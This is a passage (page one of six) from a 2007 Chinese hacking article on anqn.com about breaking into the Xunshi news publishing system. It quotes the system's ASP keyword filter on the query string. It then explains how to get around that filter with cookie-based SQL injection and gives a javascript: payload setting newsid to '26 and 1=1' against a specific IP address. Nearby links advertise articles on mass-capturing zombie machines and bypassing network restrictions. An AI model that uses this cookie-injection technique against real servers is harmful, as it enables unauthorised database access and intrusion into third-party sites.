·搜黑-全球首例黑客资讯搜索
·视频-国内视频学习教学大全
·设计-汇集百家设计网站精华
·编程-13大编程语言全面学习
安全中国首页 > 文章中心 > 黑客技术
三顾讯时--对讯时新闻发布系统的艰难突破(图)
http://www.anqn.com     时间:2007-9-24 2:15:35      责任编辑:高远      网友评论
热 点:



   然后,我们在admin_conn.asp 文件中发现如下代码:
   sss=LCase(request.servervariables("QUERY_STRING"))
   if instr(sss,"select")<>0 or instr(sss,"inster")<>0 or instr(sss,"delete")<>0 or instr(sss,"(")<>0 or instr(sss,"’or")<>0 then
     response.write "<BR><BR><center>你的网址不合法"
     response.end
   end if

   过滤了request.querystring方法获取从客户端传来的数据,过滤的内容是select,inster,delete等。虽然做了这个限制,但是我们还是可以利用cookie进行注入,因为前面的漏洞代码里面用的是request而不是request.querystring,所以我们还有reuqest.cookie方法让服务端获取我们这里的数据。
    先访问:http://222.90.4.20/news/admin_news_view.asp?newsid=26,然后去掉此URL,再   提交:javascript:alert(document.cookie="newsid="+escape("26 and 1=1"))返回如图2所示:
  


   然后在访问
http://222.90.4.20/news/admin_news_view.asp,返回如图3:

上一页 1 2 3 4 5 6 下一页

·上一篇: 整个服务器群的沦陷:一次曲折的安全检测
·下一篇: 135批量抓肉鸡 批量开TELNET

发表评论  打印本文  返回顶部  关闭窗口
最新5条评论 条评论
条评论
名称: 信箱:

相关连接
·冒充“超级兔子” 木马突破软键盘(图) [2007-9-25]
·突破SQL注入攻击时输入框长度的限制 [2007-9-22]
·AK922:突破磁盘低级检测实现文件隐藏 [2007-9-21]
·突破两大难题 江民KV2008正式发布(图) [2007-9-13]
·网吧突破1433封锁继续冲钱 [2007-9-15]
·突破腾讯空间限制暴传图片(不是黄钻) [2007-9-14]
·在网吧建立外网IP玩传奇私服和突破限制 [2007-9-13]
·我是如何突破一流检测系统的 [2007-9-9]
·突破SQL注入攻击时输入框长度的限制 [2007-9-4]
·突破网关进入内网 巧妙利用端口重定向 [2007-9-2]